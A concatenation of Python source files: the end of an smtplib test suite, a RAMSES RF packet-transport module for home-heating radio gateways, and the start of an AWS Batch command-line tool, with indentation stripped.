self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
self.assertIn(sim_auth_login_user, str(err))
smtp.close()
def test_auth_function(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
self.serv.add_feature("AUTH CRAM-MD5")
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
supported = {'CRAM-MD5': smtp.auth_cram_md5,
'PLAIN': smtp.auth_plain,
'LOGIN': smtp.auth_login,
}
for mechanism, method in supported.items():
try: smtp.auth(mechanism, method)
except smtplib.SMTPAuthenticationError as err:
self.assertIn(sim_auth_credentials[mechanism.lower()].upper(),
str(err))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=15)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
@support.reap_threads
def test_main(verbose=None):
support.run_unittest(GeneralTests, DebuggingServerTests,
NonConnectingTests,
BadHELOServerTests, SMTPSimTests,
TooLongLineTests)
if __name__ == '__main__':
test_main()
|
transport.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
"""RAMSES RF - RAMSES-II compatible Packet processor.
Operates at the pkt layer of: app - msg - pkt - h/w
"""
import asyncio
import logging
import os
import re
import sys
from datetime import datetime as dt
from datetime import timedelta as td
from multiprocessing import Process
from queue import Queue
from string import printable # ascii_letters, digits
from threading import Lock, Thread
from types import SimpleNamespace
from typing import ByteString, Callable, Generator, Optional, Tuple
from serial import SerialException, serial_for_url
from serial_asyncio import SerialTransport as SerTransportAsync
from .command import (
ARGS,
DEAMON,
FUNC,
QOS_MAX_BACKOFF,
QOS_RX_TIMEOUT,
QOS_TX_RETRIES,
QOS_TX_TIMEOUT,
Command,
Priority,
)
from .const import _PUZZ, HGI_DEVICE_ID, NON_DEVICE_ID, NUL_DEVICE_ID, __dev_mode__
from .exceptions import InvalidPacketError
from .helpers import dt_now
from .packet import Packet
from .protocol import create_protocol_factory
from .schema import SERIAL_CONFIG_SCHEMA
from .version import VERSION
DEV_MODE = __dev_mode__ and False
_LOGGER = logging.getLogger(__name__)
# _LOGGER.setLevel(logging.WARNING) # INFO may have too much detail
if DEV_MODE: # or True:
_LOGGER.setLevel(logging.DEBUG) # should be INFO
BLOCK_LIST = "block_list"
KNOWN_LIST = "known_list"
IS_INITIALIZED = "IS_INITIALIZED"
IS_EVOFW3 = "is_evofw3"
DEVICE_ID = "device_id"
DEFAULT_SERIAL_CONFIG = SERIAL_CONFIG_SCHEMA({})
ERR_MSG_REGEX = re.compile(r"^([0-9A-F]{2}\.)+$")
POLLER_TASK = "poller_task"
Pause = SimpleNamespace(
NONE=td(seconds=0),
MINIMUM=td(seconds=0.01),
SHORT=td(seconds=0.05),
DEFAULT=td(seconds=0.15),
LONG=td(seconds=0.5),
)
VALID_CHARACTERS = printable # "".join((ascii_letters, digits, ":-<*# "))
INIT_QOS = {"priority": Priority.HIGHEST, "retries": 24, "disable_backoff": True}
INIT_CMD = Command._puzzle(message=f"v{VERSION}", **INIT_QOS)
# evofw3 commands (as of 0.7.0) include (from cmd.c):
# case 'V': validCmd = cmd_version( cmd ); break;
# case 'T': validCmd = cmd_trace( cmd ); break;
# case 'B': validCmd = cmd_boot( cmd ); break;
# case 'C': validCmd = cmd_cc1101( cmd ); break;
# case 'F': validCmd = cmd_cc_tune( cmd ); break;
# case 'E': validCmd = cmd_eeprom( cmd ); break;
# !F - indicate autotune status
# !FT - start autotune
# !FS - save autotune
def _normalise(pkt_line: str, log_file: bool = False) -> str:
"""Perform any packet line hacks, as required.
Goals:
- ensure an evofw3 provides the exact same output as a HGI80
- handle 'strange' packets (e.g. I/08:/0008)
- correct any historical design failures (e.g. puzzle packets with an index)
"""
# bug fixed in evofw3 v0.6.x...
# 095 I --- 18:013393 18:000730 --:------ 0001 005 00FFFF0200 # HGI80
# 000 I --- 18:140805 18:140805 --:------ 0001 005 00FFFF0200 # evofw3
if pkt_line[10:14] == " 18:" and pkt_line[11:20] == pkt_line[21:30]:
pkt_line = pkt_line[:21] + HGI_DEVICE_ID + pkt_line[30:]
(_LOGGER.warning if DEV_MODE else _LOGGER.debug)(
"evofw3 packet line has been normalised (0x00)"
)
# pseudo-RAMSES-II packets...
elif pkt_line[10:14] in (" 08:", " 31:") and pkt_line[-16:] == "* Checksum error":
pkt_line = pkt_line[:-17] + " # Checksum error (ignored)"
(_LOGGER.warning if DEV_MODE else _LOGGER.debug)(
"Packet line has been normalised (0x01)"
)
# bug fixed in evofw3 v0.6.x...
elif pkt_line[:2] == "!C":
pkt_line = "# " + pkt_line
(_LOGGER.warning if DEV_MODE else _LOGGER.debug)(
"Packet line has been normalised (0x02)"
)
# # TODO: very old evofw3 - taken out because expensive
# elif ERR_MSG_REGEX.match(pkt_line):
# pkt_line = "# " + pkt_line
# (_LOGGER.warning if DEV_MODE else _LOGGER.debug)(
# "Packet line has been normalised (0x03)"
# )
if not log_file:
return pkt_line
pkt_line = pkt_line.strip()
# HACK for v0.11.x and earlier - puzzle packets should have no index
if pkt_line[41:45] == _PUZZ and (pkt_line[:2] != "00" or pkt_line[:4] != "0000"):
payload = f"00{pkt_line[50:]}"[:96]
pkt_line = pkt_line[:46] + f"{int(len(payload)/2):03} " + payload
(_LOGGER.warning if DEV_MODE else _LOGGER.debug)(
"Packet line has been normalised (0x04)"
)
return pkt_line
def _str(value: ByteString) -> str:
try:
result = "".join(
c
for c in value.decode("ascii", errors="strict").strip()
if c in VALID_CHARACTERS
)
except UnicodeDecodeError:
_LOGGER.warning("%s << Can't decode bytestream (ignoring)", value)
return ""
return result
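# Illustrative behaviour (added comment): _str(b"# evofw3 0.7.0\r\n") yields
# "# evofw3 0.7.0", while a byte stream that cannot be decoded as ASCII is
# logged and returns "".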
class SerTransportRead(asyncio.ReadTransport):
"""Interface for a packet transport via a dict (saved state) or a file (pkt log)."""
def __init__(self, loop, protocol, packet_source, extra=None):
self._loop = loop
self._protocol = protocol
self._packets = packet_source
self._extra = {} if extra is None else extra
self._protocol.pause_writing()
self._start()
def _start(self):
self._extra[POLLER_TASK] = self._loop.create_task(self._polling_loop())
async def _polling_loop(self):
self._protocol.connection_made(self)
if isinstance(self._packets, dict): # can assume dtm_str is OK
for dtm_str, pkt_line in self._packets.items():
self._protocol.data_received(f"{dtm_str} {pkt_line}")
await asyncio.sleep(0)
else:
for dtm_pkt_line in self._packets: # need to check dtm_str is OK
self._protocol.data_received(dtm_pkt_line) # .rstrip())
await asyncio.sleep(0)
self._protocol.connection_lost(exc=None) # EOF
class SerTransportPoll(asyncio.Transport):
"""Interface for a packet transport using polling."""
MAX_BUFFER_SIZE = 500
def __init__(self, loop, protocol, ser_instance, extra=None):
self._loop = loop
self._protocol = protocol
self.serial = ser_instance
self._extra = {} if extra is None else extra
self._is_closing = None
self._write_queue = None
self._start()
def _start(self):
self._write_queue = Queue(maxsize=self.MAX_BUFFER_SIZE)
self._extra[POLLER_TASK] = self._loop.create_task(self._polling_loop())
async def _polling_loop(self):
self._protocol.connection_made(self)
while self.serial.is_open:
await asyncio.sleep(0.001)
if self.serial.in_waiting:
# NOTE: can't use readline(), as it blocks until a newline is received
self._protocol.data_received(self.serial.read(self.serial.in_waiting))
continue
if getattr(self.serial, "out_waiting", False):
# NOTE: rfc2217 ports have no out_waiting attr!
continue
if not self._write_queue.empty():
self.serial.write(self._write_queue.get())
self._write_queue.task_done()
self._protocol.connection_lost(exc=None)
def write(self, cmd):
"""Write some data bytes to the transport.
This does not block; it buffers the data and arranges for it to be sent out
asynchronously.
"""
self._write_queue.put_nowait(cmd)
class _SerTransportProc(Process): # TODO: WIP
"""Interface for a packet transport using a process - WIP."""
def __init__(self, loop, protocol, ser_port, extra=None):
self._loop = loop
self._protocol = protocol
self._ser_port = ser_port
self._extra = {} if extra is None else extra
self.serial = None
self._is_closing = None
self._poller = None
self._write_queue = None
self._start()
def _start(self):
if DEV_MODE:
_LOGGER.debug("SerTransProc._start() STARTING loop")
self._write_queue = Queue(maxsize=200)
self.serial = serial_for_url(self._ser_port[0], **self._ser_port[1])
self.serial.timeout = 0
self._poller = Thread(target=self._polling_loop, daemon=True)
self._poller.start()
self._protocol.connection_made(self)
def _polling_loop(self):
# asyncio.set_event_loop(self._loop)
# asyncio.get_running_loop() # TODO: this fails
self._protocol.connection_made(self)
while self.serial.is_open:
# time.sleep(0.001)
if self.serial.in_waiting:
# NOTE: can't use readline(), as it blocks until a newline is received
self._protocol.data_received(self.serial.read(self.serial.in_waiting))
continue
if self.serial and getattr(self.serial, "out_waiting", False):
# NOTE: rfc2217 ports have no out_waiting attr!
continue
if not self._write_queue.empty():
self.serial.write(self._write_queue.get())
self._write_queue.task_done()
self._protocol.connection_lost(exc=None)
def write(self, cmd):
"""Write some data bytes to the transport.
This does not block; it buffers the data and arranges for it to be sent out
asynchronously.
"""
# _LOGGER.debug("SerTransProc.write(%s)", cmd)
self._write_queue.put_nowait(cmd)
class PacketProtocolBase(asyncio.Protocol):
"""Interface for a packet protocol (no Qos).
ex transport: self.data_received(bytes) -> self._callback(pkt)
to transport: self.send_data(cmd) -> self._transport.write(bytes)
"""
_dt_now = dt_now if sys.platform == "win32" else dt.now
def __init__(self, gwy, pkt_handler: Callable) -> None:
self._gwy = gwy
self._loop = gwy._loop
self._callback = pkt_handler # Could be None
self._transport = None
self._pause_writing = True
self._recv_buffer = bytes()
self._prev_pkt = None
self._this_pkt = None
self._disable_sending = gwy.config.disable_sending
self._evofw_flag = gwy.config.evofw_flag
if gwy.config.enforce_known_list:
self._exclude = []
self._include = list(gwy._include.keys())
else:
self._exclude = list(gwy._exclude.keys())
self._include = []
self._unwanted = [] # not: [NON_DEVICE_ID, NUL_DEVICE_ID]
self._hgi80 = {
IS_INITIALIZED: None,
IS_EVOFW3: None,
DEVICE_ID: None,
}
def connection_made(self, transport: asyncio.Transport) -> None:
"""Called when a connection is made."""
# _LOGGER.debug("PktProtocol.connection_made(%s)", transport)
self._transport = transport
if self._include: # TODO: here, or in init?
_LOGGER.info(
f"Enforcing the {KNOWN_LIST} (as a whitelist): %s", self._include
)
elif self._exclude:
_LOGGER.info(
f"Enforcing the {BLOCK_LIST} (as a blacklist): %s", self._exclude
)
else:
_LOGGER.warning(
f"Not using any device filter: using a {KNOWN_LIST} (as a whitelist) "
"is strongly recommended"
)
# @functools.lru_cache(maxsize=128)
def _is_wanted(self, src_id, dst_id) -> Optional[bool]:
"""Parse the packet, return True if the packet is not to be filtered out.
An unwanted device_id will 'trump' a whitelisted device_id in the same packet
because there is a significant chance the packet is simply corrupt.
"""
for dev_id in [d for d in dict.fromkeys((src_id, dst_id))]:
if dev_id in self._unwanted:
return
if dev_id in self._exclude:
_LOGGER.info(
f"Blocking packets with device_id: {dev_id} (is blacklisted), "
f"if required, remove it from the {BLOCK_LIST}"
)
self._unwanted.append(dev_id)
return
if dev_id in (NON_DEVICE_ID, NUL_DEVICE_ID):
continue
if not self._include or dev_id in self._include:
continue # check the other device_id, if any
if dev_id == self._hgi80[DEVICE_ID]:
_LOGGER.warning(
f"Allowing packets with device_id: {dev_id} (is active gateway?), "
f"configure the {KNOWN_LIST}/{BLOCK_LIST} as required"
)
self._include.append(dev_id) # the only time include list is modified
continue
_LOGGER.warning(
f"Blocking packets with device_id: {dev_id} (is not whitelisted), "
f"if required, add it to the {KNOWN_LIST}"
)
self._unwanted.append(dev_id)
return
return True
def _pkt_received(self, pkt: Packet) -> None:
"""Pass any valid/wanted packets to the callback."""
self._this_pkt, self._prev_pkt = pkt, self._this_pkt
if self._callback and self._is_wanted(pkt.src.id, pkt.dst.id):
try:
self._callback(pkt) # only wanted PKTs to the MSG transport's handler
except InvalidPacketError as exc:
_LOGGER.error("%s < %s", pkt, exc)
except: # noqa: E722 # TODO: remove broad-except
_LOGGER.exception("Exception in callback to message layer")
def _line_received(self, dtm: dt, line: str, raw_line: ByteString) -> None:
if _LOGGER.getEffectiveLevel() == logging.INFO: # i.e. don't log for DEBUG
_LOGGER.info("RF Rx: %s", raw_line)
self._hgi80[IS_INITIALIZED], was_initialized = True, self._hgi80[IS_INITIALIZED]
try:
pkt = Packet.from_port(self._gwy, dtm, line, raw_line=raw_line)
except InvalidPacketError as exc:
if "# evofw" in line and self._hgi80[IS_EVOFW3] is None:
self._hgi80[IS_EVOFW3] = line
if self._evofw_flag not in (None, "!V"):
self._transport.write(
bytes(f"{self._evofw_flag}\r\n".encode("ascii"))
)
elif was_initialized and line and line[:1] != "#" and "*" not in line:
_LOGGER.error("%s < Cant create packet (ignoring): %s", line, exc)
return
if pkt.src.type == "18": # DEX
if self._hgi80[DEVICE_ID] is None:
self._hgi80[DEVICE_ID] = pkt.src.id
elif self._hgi80[DEVICE_ID] != pkt.src.id:
(_LOGGER.debug if pkt.src.id in self._unwanted else _LOGGER.warning)(
f"{pkt} < There appears to be more than one HGI80-compatible device"
f" (active gateway: {self._hgi80[DEVICE_ID]}), this is unsupported"
)
self._pkt_received(pkt)
def data_received(self, data: ByteString) -> None:
"""Called when some data (packet fragments) is received (from RF)."""
# _LOGGER.debug("PacketProtocolBase.data_received(%s)", data.rstrip())
def _bytes_received(
data: ByteString,
) -> Generator[ByteString, ByteString, None]:
self._recv_buffer += data
if b"\r\n" in self._recv_buffer:
lines = self._recv_buffer.split(b"\r\n")
self._recv_buffer = lines[-1]
for line in lines[:-1]:
yield self._dt_now(), line
for dtm, raw_line in _bytes_received(data):
self._line_received(dtm, _normalise(_str(raw_line)), raw_line)
async def _send_data(self, data: str) -> None:
"""Send a bytearray to the transport (serial) interface."""
while self._pause_writing:
await asyncio.sleep(0.005)
# while (
# self._transport is None
# # or self._transport.serial is None # Shouldn't be required, but is!
# or getattr(self._transport.serial, "out_waiting", False)
# ):
# await asyncio.sleep(0.005)
data = bytes(data.encode("ascii"))
if _LOGGER.getEffectiveLevel() == logging.INFO: # i.e. don't log for DEBUG
_LOGGER.info("RF Tx: %s", data)
self._transport.write(data + b"\r\n")
# 0.2: can still exceed RF duty cycle limit with back-to-back restarts
# await asyncio.sleep(0.2) # TODO: RF Duty cycle, make configurable?
async def send_data(self, cmd: Command) -> None:
"""Called when some data is to be sent (not a callback)."""
_LOGGER.debug("PktProtocol.send_data(%s)", cmd)
if self._disable_sending:
raise RuntimeError("Sending is disabled")
# if not self._is_wanted(cmd.src, cmd.dst):
# _LOGGER.warning(
# return
if cmd.src.id != HGI_DEVICE_ID:
if self._hgi80[IS_EVOFW3]:
_LOGGER.info(
"Impersonating device: %s, for pkt: %s", cmd.src.id, cmd.tx_header
)
else:
_LOGGER.warning(
"Impersonating device: %s, for pkt: %s"
", NB: standard HGI80s dont support this feature, it needs evofw3!",
cmd.src.id,
cmd.tx_header,
)
await self.send_data(Command._puzzle("02", cmd.tx_header))
await self._send_data(str(cmd))
def connection_lost(self, exc: Optional[Exception]) -> None:
"""Called when the connection is lost or closed."""
_LOGGER.debug("PktProtocol.connection_lost(%s)", exc)
# serial.serialutil.SerialException: device reports error (poll)
if exc is not None:
raise exc
def pause_writing(self) -> None:
"""Called when the transport's buffer goes over the high-water mark."""
_LOGGER.debug("PktProtocol.pause_writing()")
self._pause_writing = True
def resume_writing(self) -> None:
"""Called when the transport's buffer drains below the low-water mark."""
_LOGGER.debug("PktProtocol.resume_writing()")
self._pause_writing = False
class PacketProtocolPort(PacketProtocolBase):
"""Interface for a packet protocol (without QoS)."""
def connection_made(self, transport: asyncio.Transport) -> None:
"""Called when a connection is made."""
_LOGGER.info(f"RAMSES_RF protocol library v{VERSION} (serial port)")
super().connection_made(transport) # self._transport = transport
# self._transport.serial.rts = False
# determine if using a evofw3 rather than a HGI80
self._transport.write(bytes("!V\r\n".encode("ascii")))
# add this to start of the pkt log, if any
if not self._disable_sending:
self._loop.create_task(self.send_data(INIT_CMD))
self.resume_writing()
class PacketProtocol(PacketProtocolPort):
"""Interface for a packet protocol (without QoS)."""
def __init__(self, gwy, pkt_handler: Callable) -> None:
_LOGGER.debug(
"PktProtocol.__init__(gwy, %s) *** Std version ***",
pkt_handler.__name__ if pkt_handler else None,
)
super().__init__(gwy, pkt_handler)
class PacketProtocolRead(PacketProtocolBase):
"""Interface for a packet protocol (for packet log)."""
def __init__(self, gwy, pkt_handler: Callable) -> None:
_LOGGER.debug(
"PacketProtocolRead.__init__(gwy, %s) *** R/O version ***",
pkt_handler.__name__ if pkt_handler else None,
)
super().__init__(gwy, pkt_handler)
def connection_made(self, transport: asyncio.Transport) -> None:
"""Called when a connection is made."""
_LOGGER.info(f"RAMSES_RF protocol library v{VERSION} (packet log)")
super().connection_made(transport) # self._transport = transport
def _line_received(self, dtm: str, line: str, raw_line: str) -> None:
try:
pkt = Packet.from_file(self._gwy, dtm, line)
except (InvalidPacketError, ValueError): # VE from dt.fromisoformat()
return
self._pkt_received(pkt)
def data_received(self, data: str) -> None:
"""Called when a packet line is received (from a log file)."""
# _LOGGER.debug("PacketProtocolRead.data_received(%s)", data.rstrip())
self._line_received(data[:26], _normalise(data[27:], log_file=True), data)
def _dt_now(self) -> dt:
try:
return self._this_pkt.dtm
except AttributeError:
return dt(1970, 1, 1, 1, 0)
class PacketProtocolQos(PacketProtocolPort):
"""Interface for a packet protocol (includes QoS)."""
def __init__(self, gwy, pkt_handler: Callable) -> None:
_LOGGER.debug(
"PktProtocol.__init__(gwy, %s) *** Qos version ***",
pkt_handler.__name__ if pkt_handler else None,
)
super().__init__(gwy, pkt_handler)
self._qos_lock = Lock()
self._qos_cmd = None
self._tx_hdr = None
self._rx_hdr = None
self._tx_retries = None
self._tx_retry_limit = None
self._backoff = 0
self._timeout_full = None
self._timeout_half = None
def _timeouts(self, dtm: dt) -> Tuple[dt, dt]:
"""Update self._timeout_full, self._timeout_half"""
if self._qos_cmd:
if self._tx_hdr:
timeout = QOS_TX_TIMEOUT
else:
timeout = self._qos_cmd.qos.get("timeout", QOS_RX_TIMEOUT)
self._timeout_full = dtm + timeout * 2 ** self._backoff
self._timeout_half = dtm + timeout * 2 ** (self._backoff - 1)
# _LOGGER.debug(
# "backoff=%s, timeout=%s, timeout_full=%s",
# self._backoff,
# timeout,
# self._timeout_full.isoformat(timespec="milliseconds"),
# )
# if self._timeout_half >= dtm:
# self._backoff = max(self._backoff - 1, 0)
# if self._timeout_full >= dtm:
# self._backoff = min(self._backoff + 1, QOS_MAX_BACKOFF)
def _pkt_received(self, pkt: Packet) -> None:
"""Perform any QoS functions before processing valid/wanted packets."""
def _logger_rcvd(logger, message: str) -> None:
if self._qos_cmd is None:
wanted = None
elif self._tx_hdr:
wanted = self._tx_hdr
else:
wanted = self._rx_hdr
logger(
"PktProtocolQos.data_rcvd(rcvd=%s): boff=%s, want=%s, tout=%s: %s",
pkt._hdr or str(pkt),
self._backoff,
wanted,
self._timeout_full.isoformat(timespec="milliseconds"),
message,
)
if self._qos_cmd:
_logger_rcvd(_LOGGER.debug, "CHECKING")
# NOTE: is the Tx pkt, and no response is expected
if pkt._hdr == self._tx_hdr and self._rx_hdr is None:
log_msg = "matched the Tx pkt (not wanting a Rx pkt) - now done"
self._qos_lock.acquire()
self._qos_cmd = None
self._qos_lock.release()
# NOTE: is the Tx pkt, and a response *is* expected
elif pkt._hdr == self._tx_hdr:
# assert str(pkt)[4:] == str(self._qos_cmd), "Packets dont match"
log_msg = "matched the Tx pkt (now wanting a Rx pkt)"
self._tx_hdr = None
# NOTE: is the Tx pkt, but is a *duplicate* - we've already seen it!
elif pkt._hdr == self._qos_cmd.tx_header:
# assert str(pkt) == str(self._qos_cmd), "Packets dont match"
log_msg = "duplicated Tx pkt (still wanting the Rx pkt)"
self._timeouts(dt.now()) # TODO: increase backoff?
# NOTE: is the Rx pkt, and is a non-Null (expected) response
elif pkt._hdr == self._rx_hdr:
log_msg = "matched the Rx pkt - now done"
self._qos_lock.acquire()
self._qos_cmd = None
self._qos_lock.release()
# TODO: is the Rx pkt, but is a Null response
# elif pkt._hdr == self._qos_cmd.null_header:
# log_msg = "matched a NULL Rx pkt - now done"
# self._qos_lock.acquire()
# self._qos_cmd = None
# self._qos_lock.release()
# NOTE: is not the expected pkt, but another pkt
else:
log_msg = (
"unmatched pkt (still wanting a "
+ ("Tx" if self._tx_hdr else "Rx")
+ " pkt)"
)
self._timeouts(dt.now())
_logger_rcvd(_LOGGER.debug, f"CHECKED - {log_msg}")
else: # TODO: no outstanding cmd - ?throttle down the backoff
# self._timeouts(dt.now())
_logger_rcvd(_LOGGER.debug, "XXXXXXX - ")
super()._pkt_received(pkt)
async def send_data(self, cmd: Command) -> None:
"""Called when some data is to be sent (not a callback)."""
_LOGGER.debug("PktProtocolQos.send_data(%s)", cmd)
def _logger_send(logger, message: str) -> None:
logger(
"PktProtocolQos.send_data(%s): boff=%s, want=%s, tout=%s: %s",
cmd.tx_header,
self._backoff,
self._tx_hdr or self._rx_hdr,
self._timeout_full.isoformat(timespec="milliseconds"),
message,
)
def _expired_cmd(cmd):
hdr, callback = cmd.tx_header, cmd.callback
if callback and not callback.get("expired"):
# see also: MsgTransport._pkt_receiver()
_LOGGER.error("PktProtocolQos.send_data(%s): Expired callback", hdr)
callback[FUNC](False, *callback.get(ARGS, tuple()))
callback["expired"] = not callback.get(DEAMON, False) # HACK:
while self._qos_cmd is not None:
await asyncio.sleep(0.005)
await super().send_data(cmd)
self._qos_lock.acquire()
self._qos_cmd = cmd
self._qos_lock.release()
self._tx_hdr = cmd.tx_header
self._rx_hdr = cmd.rx_header # Could be None
self._tx_retries = 0
self._tx_retry_limit = cmd.qos.get("retries", QOS_TX_RETRIES)
self._timeouts(dt.now())
while self._qos_cmd is not None: # until sent (may need re-transmit) or expired
await asyncio.sleep(0.005)
if self._timeout_full > dt.now():
await asyncio.sleep(0.02)
# await self._send_data("")
elif self._qos_cmd is None: # can be set to None by data_received
continue
elif self._tx_retries < self._tx_retry_limit:
self._tx_hdr = cmd.tx_header
self._tx_retries += 1
if not self._qos_cmd.qos.get("disable_backoff", False):
self._backoff = min(self._backoff + 1, QOS_MAX_BACKOFF)
self._timeouts(dt.now())
await self._send_data(str(cmd))
_logger_send(
(_LOGGER.warning if DEV_MODE else _LOGGER.debug),
f"RE-SENT ({self._tx_retries}/{self._tx_retry_limit})",
) # TODO: should be debug
else:
if self._qos_cmd.code != _PUZZ: # HACK: why expired when shouldn't
_logger_send(
_LOGGER.warning,
f"EXPIRED ({self._tx_retries}/{self._tx_retry_limit})",
)
_expired_cmd(self._qos_cmd)
self._qos_lock.acquire()
self._qos_cmd = None
self._qos_lock.release()
self._backoff = 0 # TODO: need a better system
break
else:
if self._timeout_half >= self._dt_now():
self._backoff = max(self._backoff - 1, 0)
_logger_send(_LOGGER.debug, "SENT OK")
def create_pkt_stack(
gwy,
pkt_callback,
protocol_factory=None,
ser_port=None,
packet_log=None,
packet_dict=None,
) -> Tuple[asyncio.Protocol, asyncio.Transport]:
"""Utility function to provide a transport to the internal protocol.
The architecture is: app (client) -> msg -> pkt -> ser (HW interface).
The msg/pkt interface is via:
- PktProtocol.data_received to (pkt_callback) MsgTransport._pkt_receiver
- MsgTransport.write (pkt_dispatcher) to (pkt_protocol) PktProtocol.send_data
"""
def _protocol_factory():
if packet_log or packet_dict is not None:
return create_protocol_factory(PacketProtocolRead, gwy, pkt_callback)()
elif gwy.config.disable_sending: # TODO: assumes we wont change our mind
return create_protocol_factory(PacketProtocol, gwy, pkt_callback)()
else:
return create_protocol_factory(PacketProtocolQos, gwy, pkt_callback)()
if len([x for x in (packet_dict, packet_log, ser_port) if x is not None]) != 1:
raise TypeError("port / file / dict should be mutually exclusive")
pkt_protocol = (protocol_factory or _protocol_factory)()
if packet_log or packet_dict is not None: # {} is a processable packet_dict
pkt_transport = SerTransportRead(
gwy._loop, pkt_protocol, packet_log or packet_dict
)
return (pkt_protocol, pkt_transport)
ser_config = DEFAULT_SERIAL_CONFIG
ser_config.update(gwy.config.serial_config)
# python client.py monitor 'alt:///dev/ttyUSB0?class=PosixPollSerial'
try:
ser_instance = serial_for_url(ser_port, **ser_config)
except SerialException as exc:
_LOGGER.error("Failed to open %s (config: %s): %s", ser_port, ser_config, exc)
raise
try: # FTDI on Posix/Linux would be a common environment for this library...
ser_instance.set_low_latency_mode(True)
except (AttributeError, NotImplementedError, ValueError): # Wrong OS/Platform/FTDI
pass
if any(
(
ser_port.startswith("rfc2217:"),
ser_port.startswith("socket:"),
os.name == "nt",
)
):
pkt_transport = SerTransportPoll(gwy._loop, pkt_protocol, ser_instance)
else:
pkt_transport = SerTransportAsync(gwy._loop, pkt_protocol, ser_instance)
return (pkt_protocol, pkt_transport)
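# --- Illustrative sketch only (not part of the library) ----------------------
# PacketProtocolQos._timeouts() above grows the retransmit window exponentially:
# the full window is timeout * 2 ** backoff and the half window uses backoff - 1,
# which is later used to decide whether the backoff can be relaxed. The helper
# below restates that calculation in isolation; _EXAMPLE_TIMEOUT is an assumed
# stand-in value, not the library's QOS_TX_TIMEOUT.
from datetime import datetime as _example_dt, timedelta as _example_td

_EXAMPLE_TIMEOUT = _example_td(milliseconds=20)  # assumed value, for illustration only

def _example_qos_windows(backoff: int, now=None):
    """Return (timeout_full, timeout_half) for a given backoff level."""
    now = now or _example_dt.now()
    full = now + _EXAMPLE_TIMEOUT * 2 ** backoff
    half = now + _EXAMPLE_TIMEOUT * 2 ** (backoff - 1)
    return full, half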
|
tools.py
|
"""
Command-line tools for interacting with AWS Batch
-------------------------------------------------
"""
import logging
import threading
import time
from typing import Any
from typing import Dict
from typing import List
from typing import Optional
import boto3
import mypy_boto3_batch as batch
import mypy_boto3_logs as logs
from mypy_boto3_batch.type_defs import DescribeJobsResponseTypeDef # noqa
from mypy_boto3_batch.type_defs import KeyValuePairTypeDef # noqa
from mypy_boto3_batch.type_defs import SubmitJobResponseTypeDef # noqa
from pyfgaws.batch import BatchJob
from pyfgaws.batch import Status
from pyfgaws.logs import DEFAULT_POLLING_INTERVAL as DEFAULT_LOGS_POLLING_INTERVAL
from pyfgaws.logs import Log
def _log_it(
region_name: str, job: BatchJob, logger: logging.Logger, delay: Optional[int] = None
) -> None:
"""Creates a background thread to print out CloudWatch logs.
Args:
region_name: the AWS region
job: the AWS batch job
logger: the logger to which logs should be printed
delay: the number of seconds to wait after polling for status. Only used when
`--watch-until` is `true`.
"""
if job.stream is None:
return None
# Create a background thread
logs_thread = threading.Thread(
target=_watch_logs, args=(region_name, job, logger, delay), daemon=True
)
logs_thread.start()
def watch_job(
*,
job_id: str,
region_name: Optional[str] = None,
print_logs: bool = True,
delay: Optional[int] = None,
) -> None:
"""Watches an AWS batch job.
This tool adds a small random jitter (+/-2 seconds) to the delay to help avoid AWS Batch API
